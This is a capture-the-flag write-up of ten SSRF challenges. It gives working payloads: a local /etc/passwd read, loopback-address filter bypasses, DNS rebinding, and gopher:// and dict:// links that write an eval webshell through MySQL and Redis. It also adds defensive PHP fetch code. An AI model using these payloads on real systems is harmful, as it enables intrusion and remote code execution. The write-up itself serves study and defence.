SSRF
web351
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
```

# curl_init — initialise a cURL session
# curl_setopt — set a cURL transfer option
# curl_exec — execute the cURL session
# curl_close — close the cURL session
This challenge has no filtering at all: the submitted url goes straight into curl_init(), so the file:// protocol can be used to read local files.

url=file:///etc/passwd

Or request the flag file directly:

url=http://127.0.0.1/flag.php

ctfshow{9fb8189e-6fea-4f05-a021-f23c4c91a97c}
web352
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    // preg_match() is called without a subject string, so it never matches anything
    if(!preg_match('/localhost|127.0.0/')){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```

(page output: hacker)

There is a filter, but it is useless: preg_match() is never given the string it should test, so nothing is ever blocked. The only real constraint is that the scheme must be http or https.

url=http://127.0.0.1/flag.php

ctfshow{bf15c38e-afb2-434b-afea-5329ca6ce728}
web353
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```

(page output: hacker)

This time the regex is actually applied to the url, and only http(s) is allowed.

The check can be bypassed with any of the following alternative spellings of 127.0.0.1:

- decimal integer: url=http://2130706433/flag.php
- hexadecimal octets: url=http://0x7F.0.0.1/flag.php
- octal octets: url=http://0177.0.0.1/flag.php
- hexadecimal integer: url=http://0x7F000001/flag.php
- shortened form: write 127.0.0.1 as 127.1
- any address in the 127.0.0.0/8 loopback block: url=http://127.127.127.127/flag.php
- url=http://0/flag.php
- url=http://0.0.0.0/flag.php

ctfshow{d91f1bfd-f48d-400d-9a81-767b3f0c9d6e}
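All of the spellings above name the loopback interface because the resolver applies inet_aton()-style parsing rules, which is why a substring blacklist on `127.0.0` cannot work. The PHP below is an added example, not code from the writeup or from ctfshow: it implements those parsing rules so a filter can normalise a host literal to a dotted quad before running a range check. The function names `canonicalize_ipv4_literal` and `is_internal_ipv4` and the sample host list are chosen for this example.

```php
<?php
// Added example (not from the writeup): normalise the IPv4 spellings that
// inet_aton()-style parsers accept, then range-check the real address.
declare(strict_types=1);

/**
 * Parse an IPv4 literal with the classic inet_aton() rules:
 * 1 to 4 dot-separated parts, each decimal, octal (leading 0) or hex (0x);
 * the last part fills all remaining bytes. Returns a dotted quad or null
 * when the string is not a numeric IPv4 literal.
 */
function canonicalize_ipv4_literal(string $host): ?string
{
    $parts = explode('.', $host);
    $n = count($parts);
    if ($n < 1 || $n > 4) {
        return null;
    }
    $values = [];
    foreach ($parts as $p) {
        if (preg_match('/^0[xX][0-9a-fA-F]+$/', $p)) {
            $values[] = hexdec(substr($p, 2));     // "0x7F", "0x7F000001"
        } elseif (preg_match('/^0[0-7]*$/', $p)) {
            $values[] = octdec($p);                // "0", "0177"
        } elseif (preg_match('/^[1-9][0-9]*$/', $p)) {
            $values[] = (int) $p;                  // "127", "2130706433"
        } else {
            return null;                           // letters, empty part, "08", ...
        }
    }
    // Every part but the last must fit one byte; the last fills the rest.
    $lastBytes = 5 - $n;                           // 4 parts -> 1 byte, 1 part -> 4 bytes
    for ($i = 0; $i < $n - 1; $i++) {
        if ($values[$i] > 255) {
            return null;
        }
    }
    if ($values[$n - 1] >= 2 ** (8 * $lastBytes)) {
        return null;
    }
    $addr = 0;
    for ($i = 0; $i < $n - 1; $i++) {
        $addr = ($addr << 8) | $values[$i];
    }
    $addr = ($addr << (8 * $lastBytes)) | $values[$n - 1];
    return long2ip($addr);
}

/** True when a host literal canonicalises to a loopback, private or reserved address. */
function is_internal_ipv4(string $host): bool
{
    $canonical = canonicalize_ipv4_literal($host);
    if ($canonical === null) {
        return false;                              // not an IPv4 literal; resolve it separately
    }
    // filter_var rejects 10/8, 172.16/12, 192.168/16 (PRIV) and
    // 0/8, 127/8, 169.254/16, 240/4 (RES).
    return filter_var(
        $canonical,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) === false;
}

// Constructed sample hosts: the web353 spellings plus a public address and a hostname.
foreach (['2130706433', '0x7F.0.0.1', '0177.0.0.1', '0x7F000001', '127.1',
          '127.127.127.127', '0', '0.0.0.0', '8.8.8.8', 'example.com'] as $h) {
    $c = canonicalize_ipv4_literal($h) ?? '(not an IPv4 literal)';
    printf("%-16s -> %-24s internal=%s\n", $h, $c, is_internal_ipv4($h) ? 'yes' : 'no');
}
```

Every loopback spelling in the list normalises to 127.0.0.1 (or 0.0.0.0 for `0`), and only `8.8.8.8` passes the range check; `example.com` is not a literal and has to go through DNS resolution before the same check can be applied to it.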
web354
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    if(!preg_match('/localhost|1|0|。/i', $url)){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```

(page output: hacker)

This one filters the digits 1 and 0 and restricts the scheme to http(s), so no numeric spelling of the loopback address survives.

Method 1

Use http://sudo.cc, a domain that resolves to 127.0.0.1:

url=http://sudo.cc/flag.php

Method 2

A 302 redirect. On a site you control, add:

```php
<?php header("Location:http://127.0.0.1/flag.php");
```

Method 3

DNS rebinding. Register at ceye.io, bind the record to 127.0.0.1, and remember to prefix the host with r:

url=http://r.xxxzc8.ceye.io/flag.php

Your own identifier is shown on the profile page:

url=http://r.xxxxxx.ceye.io/flag.php
web355
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    $host=$x['host'];
    if((strlen($host)<=5)){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```

(page output: hacker)

Here the host part of the submitted url must be at most 5 characters long.

Solution 1

url=http://127.1/flag.php

127.1 is exactly five characters.

Solution 2

url=http://0/flag.php

# 0 resolves to 127.0.0.1 on Linux and to 0.0.0.0 on Windows
web356
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    $host=$x['host'];
    if((strlen($host)<=3)){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```

(page output: hacker)

The host length is now limited to 3 characters; the second solution from above still works:

url=http://0/flag.php

On Windows this resolves to 0.0.0.0, on Linux to 127.0.0.1.
web357
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    $ip = gethostbyname($x['host']);
    echo '</br>'.$ip.'</br>';
    if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        die('ip!');
    }
    echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?>
```

(page output: scheme)

The host is resolved once and checked against the private and reserved ranges, then the url is fetched with a second, independent lookup, which is the window DNS rebinding needs. On ceye.io, fill in the first field with anything and the second with 127.0.0.1.

url=http://r.xxxxxx.ceye.io/flag.php

The page echoes 39.156.66.14, the public address returned to the gethostbyname() check; the lookup made inside file_get_contents() then receives 127.0.0.1.

ctfshow{ba38448a-6df1-45be-85f8-8c6dc1f89b5d}
web358
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}
```

The regex requires the url to start with http://ctf. and end with show.

payload: http://ctf.@127.0.0.1/flag.php?show

```php
<?php
$url="http://ctf.@127.0.0.1/flag.php?a=show";
$x=parse_url($url);
var_dump($x);
```

```
array(5) {
  ["scheme"]=> string(4) "http"
  ["host"]=> string(9) "127.0.0.1"
  ["user"]=> string(4) "ctf."
  ["path"]=> string(9) "/flag.php"
  ["query"]=> string(6) "a=show"
}
```

The leading ctf.@ is parsed as the userinfo component, so the real host is 127.0.0.1, and the trailing show sits in the query string. The regex only ever sees the raw string, so both constraints are satisfied.

url=http://ctf.@127.0.0.1/flag.php?show

ctfshow{9135f282-afb6-4abe-80c2-da78ffef26f8}
web359
```
git clone https://github.com/tarunkant/Gopherus
python gopherus.py --exploit mysql

For making it work username should not be password protected!!!

Give MySQL username: root
Give query to execute: select '<?php eval($_POST['beizi'];?>' into outfile '/var/www/html/beizi.php';

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%50%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%62%65%69%7a%69%27%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%62%65%69%7a%69%2e%70%68%70%27%3b%01%00%00%00%01
```

Everything after the `_` is URL-encoded once more before submitting; the query writes the webshell directly.

What follows is executing PHP code for RCE, which is not shown here.
web360

- Write a webshell
- Write an SSH public key
- Write a crontab entry for a reverse shell
- Master-slave replication

Writing a webshell

```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
```

Attacking Redis
```
python gopherus.py --exploit redis

Ready To get SHELL

What do you want?? (ReverseShell/PHPShell): php
Give web root location of server (default is /var/www/html):
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[beizi]);?>

Your gopher link is Ready to get PHP Shell:

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bbeizi%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
```

Submit that link as the url and it is done.

The dict:// protocol can also be used to probe port 6379:

url=dict://127.0.0.1:6379

Response:

```
ERR Unknown subcommand or wrong number of arguments for 'libcurl'. Try CLIENT HELP +OK
```

Check whether authentication is required:

url=dict://127.0.0.1:6379/info

No authentication is needed, so the working directory can be set:

url=dict://127.0.0.1:6379/config:set:dir:/var/www/html/

Then write the shell as above.

ctfshow{6b461105-14d5-48fd-b927-c910ddd2ae6c}
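Every filter in web351 through web360 fails in the same place: it inspects the string the client sent rather than the connection cURL is about to make. The PHP below is an added example, not code from the writeup or from ctfshow, showing a fetch routine that closes those gaps in one place: scheme allowlist, refusal of userinfo (the web358 `ctf.@` trick), range check on every address the host resolves to, pinning of the connection to the checked address so a second DNS answer cannot differ from the first (web354 method 3 and web357), no redirect following (web354 method 2), and a protocol allowlist that rules out gopher://, dict:// and file:// (web351, web359, web360). It assumes 64-bit PHP with the curl extension; `is_public_ip`, `validate_outbound_url`, `fetch_checked` and the sample URL list are names and data chosen for this example. The first sample URL needs working DNS to be accepted; the others are rejected even offline.

```php
<?php
// Added example (not the challenge code): an outbound fetch that validates the
// resolved address rather than the submitted string, and pins cURL to it.
declare(strict_types=1);

const MAX_BODY_BYTES = 1_000_000;

/** Reject loopback, link-local, private and other reserved addresses. */
function is_public_ip(string $ip): bool
{
    return filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) !== false;
}

/** Returns [scheme, host, port, ips] for an acceptable URL, or throws. */
function validate_outbound_url(string $url): array
{
    $u = parse_url($url);
    if ($u === false || !isset($u['scheme'], $u['host'])) {
        throw new InvalidArgumentException('unparseable URL or missing host');
    }
    $scheme = strtolower($u['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('scheme not allowed');
    }
    // "http://ctf.@127.0.0.1/" hides the real host behind '@'; refuse credentials
    // in the URL outright instead of trying to interpret them.
    if (isset($u['user']) || isset($u['pass'])) {
        throw new InvalidArgumentException('userinfo not allowed');
    }
    $host = strtolower($u['host']);
    $port = $u['port'] ?? ($scheme === 'https' ? 443 : 80);

    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $ips = [$host];                        // literal address: check it directly
    } else {
        // Hostnames, and non-canonical spellings such as "127.1" or "0", go through
        // the resolver; whatever it returns is range-checked. Only IPv4 answers are
        // considered, so IPv6-only names and "[::1]" are rejected as unresolvable.
        $ips = gethostbynamel($host);
        if ($ips === false || $ips === []) {
            throw new InvalidArgumentException('host does not resolve to IPv4');
        }
    }
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) {
            throw new InvalidArgumentException("host resolves to non-public address $ip");
        }
    }
    return [$scheme, $host, $port, $ips];
}

function fetch_checked(string $url): string
{
    [$scheme, $host, $port, $ips] = validate_outbound_url($url);

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_HEADER          => false,
        // Pin the connection to the address that was just checked, so a later
        // DNS answer (rebinding) cannot redirect the request.
        CURLOPT_RESOLVE         => ["$host:$port:{$ips[0]}"],
        // A 302 to an internal host must not be followed.
        CURLOPT_FOLLOWLOCATION  => false,
        // No gopher://, dict://, file://, not even via a redirect.
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT  => 3,
        CURLOPT_TIMEOUT         => 10,
        CURLOPT_MAXFILESIZE     => MAX_BODY_BYTES,
    ]);
    $body = curl_exec($ch);
    $err  = curl_error($ch);
    curl_close($ch);
    if ($body === false) {
        throw new RuntimeException("fetch failed: $err");
    }
    return $body;
}

// Constructed inputs: the first is the kind of URL such an endpoint should serve,
// the rest are the shapes used against web351-web360.
foreach (['https://example.com/', 'file:///etc/passwd', 'http://127.1/flag.php',
          'http://0/flag.php', 'http://ctf.@127.0.0.1/flag.php?show',
          'dict://127.0.0.1:6379/info', 'gopher://127.0.0.1:3306/_'] as $url) {
    try {
        validate_outbound_url($url);
        echo "accepted  $url\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected  $url  ({$e->getMessage()})\n";
    }
}
```

Two design points matter here. The address check and the connection use the same lookup result because CURLOPT_RESOLVE feeds the checked address back into cURL; without that, a validator like web357's gethostbyname() check is only a race against the attacker's DNS TTL. And the routine defaults closed: anything that does not parse, carries credentials, resolves to a non-public IPv4 address, or does not resolve to IPv4 at all is refused, so the decision never depends on a blacklist of spellings.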